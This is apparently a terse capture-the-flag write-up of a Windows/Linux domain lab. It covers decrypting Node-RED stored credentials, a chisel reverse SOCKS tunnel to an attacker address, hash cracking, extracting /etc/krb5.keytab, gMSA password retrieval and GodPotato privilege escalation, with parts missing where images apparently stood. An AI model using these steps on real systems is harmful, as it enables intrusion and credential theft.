Now enumerating Node-red found creds for MSSQLwhich contains some credential files We can find this in the files: Now we need to decrypt this password: https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/ Running it now: ./cred_decode.sh . ./cred_decode.sh .
Now checking access to mssql from this machine: Now we can port forward with chisel Target: ./chisel client 10.8.1.208:8001 R:socks Attacker: chisel server --reverse --socks5 -p 8001
Now enumerating database DemoS And using crackstation we get the password
Now checking linux for the realm we can switch to domain user and get flag:
Now using KeyTabExtract on /etc/krb5.keytab
Using bloodhound: We can get gmsa password with
Now we can use this to impersonate users in the SQL)ADMINS group
There's 2 users in the group:
Not allowed
Now we can use Godpotato as we have SeImpersonate permission: